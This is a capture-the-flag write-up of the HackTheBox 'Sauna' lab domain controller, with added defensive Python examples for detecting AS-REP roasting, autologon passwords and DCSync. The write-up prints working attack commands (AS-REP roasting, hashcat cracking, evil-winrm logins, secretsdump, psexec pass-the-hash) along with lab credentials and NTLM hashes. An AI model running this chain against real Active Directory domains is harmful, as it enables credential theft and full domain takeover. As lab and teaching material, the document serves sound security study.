HackTheBox.eu - Retired - Sauna
Recon
As always I start with a simple up/down scan on all TCP ports to see what is open.
nmap -T4 -p- -oX ./nmapb.xml sauna.htb
Then I convert it to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html
That is a lot of open ports. Let's rescan with the -A switch on just the open ports to try to fingerprint the OS and services.
# nmap -A -T4 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49671,49682,55242 -oX ./nmapf.xml sauna.htb
Then we convert that output to HTML as well.
So it looks like a Windows box with IIS on port 80, and it's a domain-joined computer with RPC, WinRM and SMB.
SMB allows anonymous access but nothing's there
RPC allows me to connect with no password, but access is denied for my quick testing.
Enum4linux gave me some info
We will have to try these again when we find some credentials
I get this error when trying to add a comment on the "Single Page", which looks like a blog with commenting enabled.
I did see on the same page what looks like an admin name
Here is the output from nikto
I also saw this in page
Ticket…. Roast????
I think this might be a clue put here by the creator to let us know we should be kerberoasting.
Exploit
We need to find some creds.
There is one attack we can do called AS-REP roasting.
This uses AD to get user password hashes for any account that doesn't require Kerberos pre-authentication. In other words, we don't have to know the password to get the hash; we just need a username, and if the account is configured to not use pre-authentication, AD will happily hand the hash to us (the encrypted part of the AS-REP, which we can crack offline).
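To make the condition concrete from the defender's side, here is an added example (not from the writeup) that shows the two places this weakness is visible: the DONT_REQ_PREAUTH bit in userAccountControl, and 4768 (TGT requested) events where no pre-authentication happened and an RC4 ticket was requested, which is the pattern roasting tools leave in the DC's security log. The directory records and events below are constructed sample data, not output from the Sauna box; the bit values and encryption type numbers are the real AD/Kerberos constants.

```python
"""Added example (not from the writeup): find accounts that can be AS-REP
roasted and flag AS-REQ events that look like roasting. The directory
records and 4768 events below are constructed sample data."""
from dataclasses import dataclass

# Real userAccountControl bit values from the AD schema.
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000      # "Do not require Kerberos preauthentication"

# Kerberos encryption type 0x17 is RC4-HMAC; roasting tools request it because
# the resulting hash (hashcat mode 18200) is the cheapest one to crack.
RC4_HMAC = 0x17
AES256 = 0x12


def preauth_disabled(user_account_control: int) -> bool:
    """True if the DONT_REQ_PREAUTH bit is set on the account."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def roastable_accounts(directory):
    """directory: iterable of (sAMAccountName, userAccountControl).
    Returns the sorted names whose AS-REP can be obtained without a password."""
    return sorted(name for name, uac in directory if preauth_disabled(uac))


@dataclass
class Event4768:
    """The fields of a 4768 (Kerberos TGT requested) event that matter here."""
    account: str
    client_ip: str
    pre_auth_type: int     # 0 = no pre-authentication was performed
    etype: int             # ticket encryption type that was issued


def asrep_roast_suspects(events):
    """Return (account, client_ip) for TGT requests made without pre-auth
    and with an RC4 ticket, the combination roasting tools produce."""
    return [(e.account, e.client_ip) for e in events
            if e.pre_auth_type == 0 and e.etype == RC4_HMAC]


# Constructed sample data (TEST-NET addresses, not hosts from the lab).
SAMPLE_DIRECTORY = [
    ("fsmith", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),
    ("hsmith", NORMAL_ACCOUNT),
    ("svc_loanmgr", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),
]
SAMPLE_EVENTS = [
    Event4768("hsmith", "192.0.2.20", pre_auth_type=2, etype=AES256),   # normal logon (PA-ENC-TIMESTAMP)
    Event4768("fsmith", "192.0.2.10", pre_auth_type=0, etype=RC4_HMAC),  # roast pattern
    Event4768("fsmith", "192.0.2.30", pre_auth_type=0, etype=AES256),    # no pre-auth but AES: worth a look, not flagged here
]

if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(SAMPLE_DIRECTORY))
    print("roast-like AS-REQs:", asrep_roast_suspects(SAMPLE_EVENTS))
```

The audit function is the fix-side check (clear the bit on every account it lists unless there is a documented reason), and the event filter is the detection-side check; a 4768 with pre-auth type 0 from an account that legitimately has pre-auth disabled is expected noise, so the RC4 condition is what separates a roasting run from that account's normal logons.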
Where can we get usernames though?
I just looked through the website for any names listed there.
I found
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie driver
steven Kerb ←--- Kerb huh? I see what you did there :)
JennyJoy
Now, how do we know the naming convention used in their AD?
Well, we don't, so I found this tool that, given a list of names, will generate possible AD naming conventions based on the list.
https://github.com/jseidl/usernamer
You simply supply it the list of names and dump the output to a text file.
I save my list of usernames in a file named names.txt
python ./usernamer.py -f /root/Desktop/HTB/sauna/names.txt >> /root/Desktop/HTB/sauna/usernamer.txt
Here is some of the output file it produced
Now we can try AS-REP roasting.
We will use impacket's GetNPUsers.py to run through this list and see if we get any hashes back.
python ./GetNPUsers.py egotisticalbank/ -usersfile /root/Desktop/HTB/sauna/usernamer.txt -format hashcat -outputfile /root/Desktop/HTB/sauna/hash -dc-ip 10.10.10.175
This output can look a little misleading because it only shows the failures. We need to look at our output file to see if we got any hashes.
Woohooo we got a hash for Fsmith -- I assume that is fergus smith we found on the website earlier!
Let's send that hash over to hashcat to see if we can get the password
# hashcat -m 18200 -a 0 /root/Desktop/HTB/sauna/hash /usr/share/wordlists/rockyou.txt --force
Cool,cool,cool,cool,cool,cool,cool
Got a password back
Thestrokes23
So, recap.
We now have a user account
Egotisticalbank\fsmith
Thestrokes23
A quick little enum4linux scan gets us some more info on the domain.
# enum4linux -u egotisticalbank\\fsmith -p Thestrokes23 -U 10.10.10.175 -a
Looks like this could be an interesting service account
Svc-loanmgr
Now when we go to smbclient we can actually see some of the shares.
No access to C$ or ADMIN$, and nothing in NETLOGON.
SYSVOL had some things:
\EGOTISTICAL-BANK.LOCAL\Policies\{2619FB25-7519-4AEA-9C1E-348725EF2858}\machine\Microsoft\windows nt\secedit\GptTmpl.inf
The same file name under
\EGOTISTICAL-BANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\machine\Microsoft\windows NT\secedit\
had a bit more info. It looks to me like a password policy set in Group Policy.
The same file under
\EGOTISTICAL-BANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\machine\Microsoft\windows NT\secedit\
looks like group memberships set in Group Policy.
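Those GptTmpl.inf files are the security templates the Default Domain Policy and Default Domain Controllers Policy apply, and they are readable by every domain user, so they are worth reviewing on your own domain before someone else does. Here is an added example (not from the writeup; the Sauna box's actual file contents are not shown on this page) that parses the INI-shaped template, reports password-policy settings weaker than a baseline, and pulls out the enforced group memberships. SAMPLE_GPTTMPL is constructed and its SIDs are placeholders; the thresholds in check_password_policy are this example's own baseline.

```python
"""Added example (not from the writeup): parse a GptTmpl.inf security
template pulled from SYSVOL and report weak password-policy settings and the
group memberships it enforces. SAMPLE_GPTTMPL is constructed (placeholder
SIDs); the thresholds below are this example's own baseline."""
import configparser


def parse_gpttmpl(text: str) -> configparser.ConfigParser:
    """GptTmpl.inf is INI-shaped: [System Access], [Group Membership], ..."""
    cfg = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cfg.optionxform = str   # keep key case, e.g. MinimumPasswordLength
    cfg.read_string(text)
    return cfg


def load_gpttmpl(path: str) -> configparser.ConfigParser:
    """Files copied from SYSVOL are UTF-16 with a BOM; 'utf-16' handles either byte order."""
    with open(path, encoding="utf-16") as fh:
        return parse_gpttmpl(fh.read())


def _int(section, key):
    raw = section.get(key)
    return None if raw is None or raw.strip() == "" else int(raw.strip())


def check_password_policy(cfg):
    """Return (key, value, reason) triples for settings weaker than the baseline."""
    if not cfg.has_section("System Access"):
        return []
    sa = cfg["System Access"]
    findings = []
    min_len = _int(sa, "MinimumPasswordLength")
    if min_len is not None and min_len < 14:
        findings.append(("MinimumPasswordLength", min_len, "below 14 characters"))
    if _int(sa, "PasswordComplexity") == 0:
        findings.append(("PasswordComplexity", 0, "complexity requirement disabled"))
    if _int(sa, "LockoutBadCount") == 0:
        findings.append(("LockoutBadCount", 0, "no account lockout: online guessing is unthrottled"))
    if _int(sa, "ClearTextPassword") == 1:
        findings.append(("ClearTextPassword", 1, "passwords stored with reversible encryption"))
    return findings


def group_members(cfg):
    """Map each '<sid>__Members' entry under [Group Membership] to its member list."""
    if not cfg.has_section("Group Membership"):
        return {}
    result = {}
    for key, raw in cfg["Group Membership"].items():
        if key.endswith("__Members"):
            group = key[: -len("__Members")]
            result[group] = [m.strip() for m in raw.split(",") if m.strip()]
    return result


# Constructed sample template (placeholder SIDs; S-1-5-32-544 is BUILTIN\Administrators).
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
ClearTextPassword = 0
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-0-0-0-1108,*S-1-5-21-0-0-0-512
"""

if __name__ == "__main__":
    cfg = parse_gpttmpl(SAMPLE_GPTTMPL)
    for key, value, reason in check_password_policy(cfg):
        print(f"{key}={value}: {reason}")
    for group, members in group_members(cfg).items():
        print(f"{group} <- {', '.join(members)}")
```

On a real review you would call load_gpttmpl() on each template under Policies\{GUID}\MACHINE\Microsoft\Windows NT\SecEdit\ and compare the [Group Membership] entries against what you expect to be in the built-in Administrators group; a Restricted Groups entry that adds an unexpected SID is exactly the kind of thing this file reveals.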
Let's see if we can connect up to the winrm we saw in our nmap scan
I'm going to use evil-winrm to connect
https://github.com/Hackplayers/evil-winrm
Just going to test the connection and not setup any folders
# evil-winrm -i 10.10.10.175 -u egotisticalbank\\fsmith -p Thestrokes23
Let's get that user hash
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5*******************************
Local admin group shows no local users other than Administrator
FSmith doesn't have rights to the wwwroot folder
What groups are in AD?
Let's let bloodhound do the leg work for us
First we need to load up SharpHound.ps1 in evil-winrm; I copied it to my scripts directory (/opt/impacket/examples/) so evil-winrm can see it:
./Sharphound.ps1
After the script loads we can see Invoke-BloodHound in our menu.
*Evil-WinRM* PS C:\temp> Invoke-BloodHound -Domain egotisticalbank -LDAPUser fsmith -LDAPPass Thestrokes23 -CollectionMethod All -DomainController sauna
Now we download the output to our Kali box.
Then just drag and drop it into BloodHound.
I then mark FSmith as owned since we have his creds.
I poked around in here for a bit but couldn't really find a path from fsmith to get anywhere.
So I loaded up winpeas.bat in the C:\temp folder and found this
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
So we have another user
User: egotisticalbank\Svc_loanmanager
Pass: Moneymakestheworldgoround!
You might notice that the svc account name is different in the regkey than what we found while enumerating the box.
We saw svc_loanmgr not svc_loanmanager.
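The two registry values winPEAS surfaced are Winlogon's automatic-logon settings, and HKLM\...\Winlogon is readable by any local user, so a DefaultPassword stored there is a plaintext credential available to everyone who can log on. Here is an added example (not from the writeup) that parses the text `reg query` prints for that key, as winPEAS shows it, and raises the findings a reviewer would raise. SAMPLE_REG_QUERY is constructed (the password value is a placeholder, not the one from the box); read_live_winlogon() is a hypothetical helper for running the same check on a Windows host and does nothing elsewhere.

```python
"""Added example (not from the writeup): spot Winlogon autologon credentials
the way winPEAS surfaced them on this box. SAMPLE_REG_QUERY is constructed;
the password is a placeholder."""
import re
import sys

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def parse_reg_query(text: str) -> dict:
    """Turn 'reg query' output into {value_name: (type, data)}.
    reg query separates columns with runs of spaces; the key path line has no REG_ type."""
    values = {}
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            data = parts[2] if len(parts) == 3 else ""
            values[parts[0]] = (parts[1], data)
    return values


def autologon_findings(values: dict) -> list:
    """Findings a reviewer would raise for the Winlogon key."""
    findings = []
    enabled = values.get("AutoAdminLogon", ("", "0"))[1].strip() == "1"
    user = values.get("DefaultUserName", ("", ""))[1]
    domain = values.get("DefaultDomainName", ("", ""))[1]
    password = values.get("DefaultPassword", ("", ""))[1]
    who = f"{domain}\\{user}" if domain and "\\" not in user else user
    if enabled:
        findings.append(f"AutoAdminLogon is on for {who}")
    if password:
        # The Winlogon key is world-readable; the supported place for an autologon
        # secret is the LSA DefaultPassword secret, which only SYSTEM/admins can read.
        findings.append(f"DefaultPassword holds a plaintext password for {who}")
    return findings


def read_live_winlogon() -> dict:
    """Hypothetical helper: read the real key on a Windows host, empty dict elsewhere."""
    if not sys.platform.startswith("win"):
        return {}
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        index = 0
        while True:
            try:
                name, data, kind = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = ("REG_SZ" if kind == winreg.REG_SZ else str(kind), str(data))
            index += 1
    return values


# Constructed sample of 'reg query' output for the Winlogon key.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    PLACEHOLDER-not-the-real-password
    Shell    REG_SZ    explorer.exe
"""

if __name__ == "__main__":
    live = read_live_winlogon()
    for finding in autologon_findings(live or parse_reg_query(SAMPLE_REG_QUERY)):
        print(finding)
```

The fix on a real host is to remove DefaultPassword and, if autologon is genuinely needed, move the secret into the LSA secret that Sysinternals Autologon manages; the check above is what you would run across a fleet to find the hosts that still have the plaintext value.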
Let's see if the creds work for WinRM.
# evil-winrm -i 10.10.10.175 -u egotisticalbank\\svc_loanmgr -p Moneymakestheworldgoround! -e /Payloads/
Yup so we now have two sets of working credentials
What did bloodhound say about svc_loanmgr?
Well, svc_loanmgr has GetChanges permissions on the domain, which basically means they have rights to perform a directory sync against AD.
Which means they can get a copy of all AD info, like password hashes.
Mwahaha!!!!
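What BloodHound is reporting here is an ACE on the domain object granting the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, which together let a principal ask a DC to replicate secrets. Here is an added example (not from the writeup) of the two defender checks that matter: auditing which principals hold both rights beyond the default replicators, and filtering 4662 (object operation) events for a non-machine account exercising those rights, which is how a DCSync shows up in the DC's security log. The extended-right GUIDs and well-known SIDs are the real values; the ACEs and events are constructed sample data with placeholder domain SIDs.

```python
"""Added example (not from the writeup): audit which principals hold the
directory-replication rights BloodHound reports as DCSync, and flag 4662
events where a non-DC account used them. GUIDs and well-known SIDs are real;
the ACEs and events are constructed sample data."""
import re
from dataclasses import dataclass

# Extended-right GUIDs from the AD schema (real values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that replicate the directory by default (real well-known SIDs).
EXPECTED_REPLICATORS = {
    "S-1-5-18",       # SYSTEM
    "S-1-5-9",        # Enterprise Domain Controllers
    "S-1-5-32-544",   # BUILTIN\Administrators
}
DOMAIN_CONTROLLERS_RID = 516   # <domain SID>-516 is the Domain Controllers group

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


@dataclass
class Ace:
    trustee_sid: str
    trustee_name: str
    object_type: str   # GUID of the extended right this ACE grants
    allow: bool = True


def _expected(sid: str) -> bool:
    return sid in EXPECTED_REPLICATORS or sid.endswith(f"-{DOMAIN_CONTROLLERS_RID}")


def unexpected_dcsync_holders(aces):
    """Trustees holding BOTH replication rights on the domain head that are not
    a default replicator. Returns sorted trustee names."""
    held = {}
    for ace in aces:
        guid = ace.object_type.lower()
        if ace.allow and guid in DCSYNC_RIGHTS:
            held.setdefault((ace.trustee_sid, ace.trustee_name), set()).add(guid)
    return sorted(name for (sid, name), rights in held.items()
                  if rights == DCSYNC_RIGHTS and not _expected(sid))


@dataclass
class Event4662:
    subject: str       # account that performed the operation
    properties: str    # the event's Properties field, which lists control-access GUIDs


def dcsync_events(events):
    """Subjects of 4662 entries where a non-machine account exercised a replication right."""
    hits = []
    for e in events:
        guids = set(GUID_RE.findall(e.properties.lower()))
        if guids & DCSYNC_RIGHTS and not e.subject.endswith("$"):
            hits.append(e.subject)
    return hits


# Constructed sample data (placeholder domain SID S-1-5-21-0-0-0).
SAMPLE_ACES = [
    Ace("S-1-5-18", "SYSTEM", DS_REPLICATION_GET_CHANGES),
    Ace("S-1-5-18", "SYSTEM", DS_REPLICATION_GET_CHANGES_ALL),
    Ace("S-1-5-32-544", "Administrators", DS_REPLICATION_GET_CHANGES),
    Ace("S-1-5-32-544", "Administrators", DS_REPLICATION_GET_CHANGES_ALL),
    Ace("S-1-5-21-0-0-0-516", "Domain Controllers", DS_REPLICATION_GET_CHANGES),
    Ace("S-1-5-21-0-0-0-516", "Domain Controllers", DS_REPLICATION_GET_CHANGES_ALL),
    Ace("S-1-5-21-0-0-0-1108", "svc_loanmgr", DS_REPLICATION_GET_CHANGES),
    Ace("S-1-5-21-0-0-0-1108", "svc_loanmgr", DS_REPLICATION_GET_CHANGES_ALL),
    Ace("S-1-5-21-0-0-0-1103", "hsmith", DS_REPLICATION_GET_CHANGES),   # only one of the pair
]
SAMPLE_EVENTS = [
    Event4662("SAUNA$", "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),  # DC-to-DC replication
    Event4662("svc_loanmgr", "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    Event4662("fsmith", "{bf967aba-0de6-11d0-a285-00aa003049e2}"),   # some other object access
]

if __name__ == "__main__":
    print("non-default DCSync holders:", unexpected_dcsync_holders(SAMPLE_ACES))
    print("DCSync-like 4662 subjects:", dcsync_events(SAMPLE_EVENTS))
```

The event check only fires when object-access auditing for the domain object is enabled (4662 is not logged by default for directory service access), which is why the ACL audit is the check to run first: an account that should never replicate should simply not hold the rights.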
Let's use impacket's secretsdump.py to get those hashes
# secretsdump.py -just-dc-ntlm egotisticalbank/svc_loanmgr@sauna.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:2dbc1c3839ca89e56f5331320cb10d25:::
Now let's try to pass the hash to get into sauna.htb as administrator
python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff administrator@sauna.htb cmd.exe
Woot
Let's get that root hash
I tried running the administrator hash against rockyou.txt using hashcat, but apparently it wasn't in the list.
So anyway, fun box!